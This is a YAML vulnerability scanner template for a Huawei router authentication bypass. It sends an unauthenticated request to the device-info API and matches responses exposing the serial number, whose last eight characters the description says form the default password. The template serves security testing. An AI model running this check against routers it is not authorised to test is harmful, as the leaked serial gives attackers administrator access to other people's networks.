id: huawei-router-auth-bypass

info:
  name: Huawei Router Authentication Bypass
  author: gy741
  severity: critical
  description: The default password of this router is the last 8 characters of the device's serial number which exist in the back of the device.
  reference:
    - https://www.exploit-db.com/exploits/48310
  tags: huawei,auth-bypass,router

requests:
  - raw:
      - |
        GET /api/system/deviceinfo HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referer: {{BaseURL}}
        X-Requested-With: XMLHttpRequest
        Connection: close

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "DeviceName"
          - "SerialNumber"
          - "HardwareVersion"
        condition: and